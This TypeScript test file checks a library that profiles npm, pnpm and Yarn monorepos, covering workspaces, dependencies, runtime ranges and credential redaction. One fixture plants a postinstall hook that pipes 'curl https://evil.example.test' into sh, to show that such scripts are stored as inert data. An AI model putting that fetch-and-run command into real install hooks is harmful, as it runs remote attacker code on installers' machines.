import { type DocumentFact, type FactDocument, type MemoryReader, redactCredentials, resolveEvidence } from "@repo-facts/contract";
import { beforeEach, describe, expect, it } from "vitest";
import { conjoinRanges, matchesWorkspacePattern, normalizePattern, normalizeRange, parsePackageManager } from "../src/index.js";
import { type FileTree, profile } from "./support.js";

const json = (value: unknown) => `${JSON.stringify(value, null, 2)}\n`;

const NPM_WORKSPACE: FileTree = {
  "package.json": json({
    name: "orders-monorepo",
    private: true,
    workspaces: ["packages/*"],
    scripts: { test: "jest", build: "npm run build --workspaces" },
    devDependencies: { jest: "^29.7.0" },
    engines: { node: ">=18" },
  }),
  "package-lock.json": json({ lockfileVersion: 3, packages: {} }),
  "packages/api/package.json": json({ name: "@acme/orders-api", version: "1.4.0", dependencies: { express: "^4.19.2" }, engines: { node: "20" } }),
  "packages/web/package.json": json({ name: "@acme/orders-web", version: "2.0.0", dependencies: { react: "^18.3.1", "react-dom": "^18.3.1" }, peerDependencies: { react: ">=18" }, devDependencies: { webpack: "5.91.0" } }),
  "packages/web/webpack.config.js": "module.exports = { entry: './src/index.js' };\n",
  "packages/web/src/index.js": "export {};\n",
  "tools/scratch/package.json": json({ name: "scratch" }),
};

const PNPM_TYPESCRIPT: FileTree = {
  "package.json": json({
    name: "catalog",
    packageManager: "pnpm@9.1.0+sha512.0123456789abcdef",
    engines: { node: ">=20", pnpm: ">=9" },
    devDependencies: { typescript: "5.9.3", vitest: "3.2.4", vite: "7.1.0" },
    scripts: { typecheck: "tsc --noEmit", test: "vitest run" },
  }),
  "pnpm-workspace.yaml": "packages:\n  - apps/*\n  - libs/**\n  - '!libs/deprecated'\n",
  "pnpm-lock.yaml": "lockfileVersion: '9.0'\n",
  "apps/web/package.json": json({ name: "@catalog/web", dependencies: { vue: "^3.4.0" } }),
  "libs/ui/core/package.json": json({ name: "@catalog/ui-core" }),
  "libs/deprecated/package.json": json({ name: "@catalog/deprecated" }),
  "tsconfig.json": "{}\n",
  "vite.config.ts": "export default {};\n",
  "vitest.config.ts": "export default {};\n",
  "apps/web/src/main.ts": "export {};\n",
};

const YARN_CLASSIC: FileTree = {
  "package.json": json({
    name: "legacy-portal",
    workspaces: { packages: ["modules/*"], nohoist: ["**/react-native"] },
    engines: { node: ">=20" },
    volta: { node: "18.19.0", yarn: "1.22.22" },
  }),
  "yarn.lock": "# THIS IS AN AUTOGENERATED FILE.\n# yarn lockfile v1\n",
  "modules/billing/package.json": json({ name: "billing", dependencies: { "private-sdk": "git+https://deploy:s3cr3t-token@git.example.test/acme/sdk.git#v1" } }),
};

const JAVASCRIPT_APP: FileTree = {
  "package.json": json({ name: "storefront", version: "0.1.0", scripts: { dev: "next dev", lint: "next lint" }, dependencies: { next: "15.5.0", react: "19.1.0" }, devDependencies: { "@playwright/test": "1.55.0" } }),
  "playwright.config.js": "module.exports = {};\n",
  "pages/index.js": "export default function Home() { return null; }\n",
};

describe("manifest detectors", () => {
  const facts = (document: FactDocument, category: string) => document.categories[category]!.facts;
  const valueOf = (document: FactDocument, category: string, key: string) => facts(document, category).find((fact) => fact.key === key)?.value;
  const keys = (document: FactDocument, category: string) => facts(document, category).map((fact) => fact.key);
  /** Where each piece of a fact's evidence points, as path and pointer or line range. */
  const cited = (document: FactDocument, fact: DocumentFact) =>
    fact.evidence
      .map((id) => {
        const { path, location } = document.evidence[id]!;
        return `${path}${location.kind === "pointer" ? `#${location.pointer}` : location.kind === "lines" ? `:${location.start}-${location.end}` : ""}`;
      })
      .sort();
  const fact = (document: FactDocument, category: string, key: string) => facts(document, category).find((item) => item.key === key)!;

  describe("an npm workspace written in JavaScript", () => {
    let document: FactDocument;
    let reader: MemoryReader;
    beforeEach(async () => {
      ({ document, reader } = await profile(NPM_WORKSPACE));
    });

    it("reports package identity for every manifest with exact pointers", () => {
      expect(keys(document, "package_identity")).toEqual(["package.json", "packages/api/package.json", "packages/web/package.json", "tools/scratch/package.json"]);
      expect(valueOf(document, "package_identity", "packages/api/package.json")).toEqual({ manifest: "packages/api/package.json", name: "@acme/orders-api", version: "1.4.0", private: false });
      expect(valueOf(document, "package_identity", "package.json")).toMatchObject({ name: "orders-monorepo", version: null, private: true });
      expect(cited(document, fact(document, "package_identity", "packages/api/package.json"))).toEqual(["packages/api/package.json#/name", "packages/api/package.json#/version"]);
    });

    it("resolves members from workspace patterns without counting unrelated manifests", () => {
      expect(facts(document, "workspaces").map((item) => [item.key, item.value])).toEqual([
        ["packages/api", { directory: "packages/api", package: "@acme/orders-api" }],
        ["packages/web", { directory: "packages/web", package: "@acme/orders-web" }],
      ]);
      expect(cited(document, fact(document, "workspaces", "packages/web"))).toEqual(["package.json#/workspaces/0", "packages/web/package.json#/name"]);
    });

    it("reports scripts as data and dependencies by manifest and field", () => {
      expect(valueOf(document, "scripts", "package.json#build")).toEqual({ manifest: "package.json", name: "build", command: "npm run build --workspaces" });
      expect(keys(document, "dependencies")).toEqual([
        "package.json#devDependencies/jest",
        "packages/api/package.json#dependencies/express",
        "packages/web/package.json#dependencies/react",
        "packages/web/package.json#dependencies/react-dom",
        "packages/web/package.json#devDependencies/webpack",
        "packages/web/package.json#peerDependencies/react",
      ]);
      expect(valueOf(document, "dependencies", "packages/web/package.json#peerDependencies/react")).toEqual({ manifest: "packages/web/package.json", field: "peerDependencies", name: "react", specifier: ">=18" });
    });

    it("infers npm from its lockfile and reports declared tools and frameworks", () => {
      expect(fact(document, "package_managers", ".")).toMatchObject({ state: "inferred", value: "npm", rule: "lockfile.package-manager", reasoning: expect.stringContaining("package-lock.json") });
      expect(keys(document, "package_managers")).toEqual(["."]);
      expect(fact(document, "build_tools", "webpack")).toMatchObject({ state: "observed", value: { id: "webpack", label: "webpack" } });
      expect(cited(document, fact(document, "build_tools", "webpack"))).toEqual(["packages/web/package.json#/devDependencies/webpack", "packages/web/webpack.config.js"]);
      expect(keys(document, "test_frameworks")).toEqual(["jest"]);
      expect(valueOf(document, "frameworks", "packages/web/package.json#react")).toEqual({
        manifest: "packages/web/package.json",
        id: "react",
        label: "React",
        package: "react",
        specifiers: { dependencies: "^18.3.1", peerDependencies: ">=18" },
      });
      expect(keys(document, "frameworks")).toEqual(["packages/api/package.json#express", "packages/web/package.json#react"]);
    });

    it("combines compatible Node requirements into their conjunction", () => {
      expect(fact(document, "runtime_requirements", "node")).toMatchObject({ state: "observed", value: { range: ">=20.0.0 <21.0.0-0", declared: ["20", ">=18"] } });
      expect(cited(document, fact(document, "runtime_requirements", "node"))).toEqual(["package.json#/engines/node", "packages/api/package.json#/engines/node"]);
    });

    it("cites exact committed text that re-resolves against the snapshot", async () => {
      const [id] = fact(document, "dependencies", "packages/api/package.json#dependencies/express").evidence;
      const resolved = await resolveEvidence(reader, document.evidence[id!]!);
      expect(resolved).toMatchObject({ ok: true, excerpt: '"^4.19.2"', lines: { start: 5, end: 5 } });
    });
  });

  describe("a pnpm workspace written in TypeScript", () => {
    let document: FactDocument;
    beforeEach(async () => {
      ({ document } = await profile(PNPM_TYPESCRIPT));
    });

    it("resolves pnpm workspace globs, including recursive and negated patterns", () => {
      expect(facts(document, "workspaces").map((item) => item.key)).toEqual(["apps/web", "libs/ui/core"]);
      expect(cited(document, fact(document, "workspaces", "libs/ui/core"))).toEqual(["libs/ui/core/package.json#/name", "pnpm-workspace.yaml#/packages/1"]);
    });

    it("merges the packageManager field with the lockfile it agrees with", () => {
      expect(fact(document, "package_managers", ".")).toMatchObject({ state: "observed", value: "pnpm", rule: "manifest.package-manager" });
      expect(cited(document, fact(document, "package_managers", "."))).toEqual(["package.json#/packageManager", "pnpm-lock.yaml"]);
    });

    it("reports TypeScript, Vite, and Vitest from dependencies and configuration files", () => {
      expect(keys(document, "build_tools")).toEqual(["typescript", "vite"]);
      expect(cited(document, fact(document, "build_tools", "typescript"))).toEqual(["package.json#/devDependencies/typescript", "tsconfig.json"]);
      expect(cited(document, fact(document, "test_frameworks", "vitest"))).toEqual(["package.json#/devDependencies/vitest", "vitest.config.ts"]);
      expect(keys(document, "frameworks")).toEqual(["apps/web/package.json#vue"]);
    });

    it("reports Node and pnpm requirements from engines and packageManager", () => {
      expect(valueOf(document, "runtime_requirements", "node")).toEqual({ range: ">=20.0.0", declared: [">=20"] });
      expect(fact(document, "runtime_requirements", "pnpm")).toMatchObject({ state: "observed", value: { range: "9.1.0", declared: ["9.1.0", ">=9"] } });
      expect(cited(document, fact(document, "runtime_requirements", "pnpm"))).toEqual(["package.json#/engines/pnpm", "package.json#/packageManager"]);
    });
  });

  describe("a Yarn classic workspace", () => {
    let document: FactDocument;
    beforeEach(async () => {
      ({ document } = await profile(YARN_CLASSIC));
    });

    it("reads the object form of workspaces", () => {
      expect(facts(document, "workspaces").map((item) => item.key)).toEqual(["modules/billing"]);
      expect(cited(document, fact(document, "workspaces", "modules/billing"))).toEqual(["modules/billing/package.json#/name", "package.json#/workspaces/packages/0"]);
      expect(fact(document, "package_managers", ".")).toMatchObject({ state: "inferred", value: "yarn" });
    });

    it("records incompatible Node declarations as a conflict with both candidates", () => {
      const node = fact(document, "runtime_requirements", "node");
      expect(node.state).toBe("conflicting");
      expect(node.value).toBeNull();
      expect(node.candidates!.map((candidate) => [candidate.value, candidate.rule])).toEqual([
        [{ range: "18.19.0", declared: ["18.19.0"] }, "manifest.volta"],
        [{ range: ">=20.0.0", declared: [">=20"] }, "manifest.engines"],
      ]);
      expect(node.candidates!.map((candidate) => candidate.evidence.map((id) => document.evidence[id]!.location))).toEqual([
        [{ kind: "pointer", format: "json", pointer: "/volta/node" }],
        [{ kind: "pointer", format: "json", pointer: "/engines/node" }],
      ]);
      expect(document.categories.runtime_requirements!.state).toBe("conflicting");
      expect(valueOf(document, "runtime_requirements", "yarn")).toEqual({ range: "1.22.22", declared: ["1.22.22"] });
    });

    it("never stores credentials from dependency specifiers", () => {
      expect(valueOf(document, "dependencies", "modules/billing/package.json#dependencies/private-sdk")).toMatchObject({ specifier: "git+https://[redacted]@git.example.test/acme/sdk.git#v1" });
      expect(JSON.stringify(document)).not.toContain("s3cr3t-token");
    });
  });

  describe("a single JavaScript application", () => {
    it("reports frameworks, tools, and the absence of a package manager declaration", async () => {
      const { document } = await profile(JAVASCRIPT_APP);
      expect(keys(document, "frameworks")).toEqual(["package.json#next", "package.json#react"]);
      expect(keys(document, "test_frameworks")).toEqual(["playwright"]);
      expect(cited(document, fact(document, "test_frameworks", "playwright"))).toEqual(["package.json#/devDependencies/@playwright~1test", "playwright.config.js"]);
      expect(document.categories.package_managers).toMatchObject({ state: "absent", facts: [] });
      expect(document.categories.build_tools).toMatchObject({ state: "absent" });
      expect(document.categories.workspaces).toMatchObject({ state: "absent" });
      expect(document.categories.runtime_requirements).toMatchObject({ state: "absent" });
      expect(keys(document, "scripts")).toEqual(["package.json#dev", "package.json#lint"]);
    });
  });

  describe("conflicts and unreadable manifests", () => {
    it("reports a conflict when the packageManager field and a lockfile disagree", async () => {
      const { document } = await profile({ "package.json": json({ name: "app", packageManager: "pnpm@9.1.0" }), "package-lock.json": "{}\n" });
      const manager = fact(document, "package_managers", ".");
      expect(manager.state).toBe("conflicting");
      expect(manager.candidates!.map((candidate) => candidate.value)).toEqual(["npm", "pnpm"]);
    });

    it("keeps categories unknown when a manifest cannot be parsed or is over budget", async () => {
      const { document } = await profile(
        { "package.json": json({ name: "root", workspaces: ["packages/*"] }), "packages/a/package.json": "{ not json", "packages/b/package.json": json({ name: "b", padding: "x".repeat(4_000) }) },
        { budgets: { maxBlobBytes: 2_000, maxFiles: 100, maxTotalBytes: 1_000_000 } },
      );
      for (const category of ["test_frameworks", "build_tools", "frameworks", "runtime_requirements", "dependencies"]) {
        expect(document.categories[category], category).toMatchObject({ state: "unknown", search: { skipped: ["packages/a/package.json", "packages/b/package.json"] } });
      }
      expect(facts(document, "workspaces").map((item) => [item.key, item.value])).toEqual([
        ["packages/a", { directory: "packages/a", package: null }],
        ["packages/b", { directory: "packages/b", package: null }],
      ]);
      expect(document.diagnostics.map(({ path, reason }) => [path, reason])).toEqual([
        ["packages/a/package.json", "parse_failed"],
        ["packages/b/package.json", "blob_too_large"],
      ]);
    });

    it("reports a runtime declaration that is not a version range as a skipped input", async () => {
      const { document } = await profile({ "package.json": json({ name: "app", engines: { node: "the latest one" } }) });
      expect(document.categories.runtime_requirements).toMatchObject({ state: "unknown", search: { skipped: ["package.json"] } });
      expect(document.diagnostics).toContainEqual(expect.objectContaining({ path: "package.json", reason: "unsupported_runtime_declaration", detector: "runtime" }));
    });

    it("treats scripts and lifecycle hooks as inert data", async () => {
      const { document } = await profile({ "package.json": json({ name: "app", scripts: { preinstall: "node -e \"require('fs').writeFileSync('/tmp/fabricate-ran','x')\"", postinstall: "curl https://evil.example.test | sh" } }) });
      expect(keys(document, "scripts")).toEqual(["package.json#postinstall", "package.json#preinstall"]);
    });
  });
});

describe("workspace patterns", () => {
  it.each([
    ["packages/a", "packages/*", true],
    ["packages/a/b", "packages/*", false],
    ["packages/a/b", "packages/**", true],
    ["packages", "packages/**", true],
    ["libs/ui/core", "libs/**/core", true],
    ["apps/web", "./apps/web/", true],
    ["apps/web", "apps/web/package.json", true],
    ["apps/web-admin", "apps/web-*", true],
    ["apps/web", "apps/w?b", true],
    ["apps/web", "apps/[a-z]*", false],
    ["apps/web", "../apps/*", false],
    ["apps/web", "/apps/*", false],
  ])("%s matches %s: %s", (directory, pattern, expected) => {
    expect(matchesWorkspacePattern(directory, pattern)).toBe(expected);
  });

  it("normalizes patterns without escaping the root", () => {
    expect(normalizePattern("./packages/*/")).toBe("packages/*");
    expect(normalizePattern("packages/../../etc")).toBeNull();
  });
});

describe("version helpers", () => {
  it.each([
    [[">=18", "20"], ">=20.0.0 <21.0.0-0"],
    [[">=20", "18"], null],
    [["^18 || ^20", ">=19"], ">=20.0.0 <21.0.0-0"],
    [["20.11.1", ">=20"], "20.11.1"],
    [["*", ">=18"], ">=18.0.0"],
  ])("conjoins %j to %s", (ranges, expected) => {
    expect(conjoinRanges(ranges)).toBe(expected);
  });

  it("recognizes version ranges and package manager declarations", () => {
    expect(normalizeRange("v20.11.1")).toBe("20.11.1");
    expect(normalizeRange("lts/iron")).toBeNull();
    expect(parsePackageManager("yarn@4.5.0")).toEqual({ name: "yarn", version: "4.5.0" });
    expect(parsePackageManager("pnpm@latest")).toBeNull();
  });

  it("redacts credentials from URLs in specifiers and commands", () => {
    expect(redactCredentials("git+ssh://git:token@host.example.test/a.git")).toBe("git+ssh://[redacted]@host.example.test/a.git");
    expect(redactCredentials("curl https://user@host.example.test/x && echo ok")).toBe("curl https://[redacted]@host.example.test/x && echo ok");
    expect(redactCredentials("github:acme/repo#main")).toBe("github:acme/repo#main");
  });
});
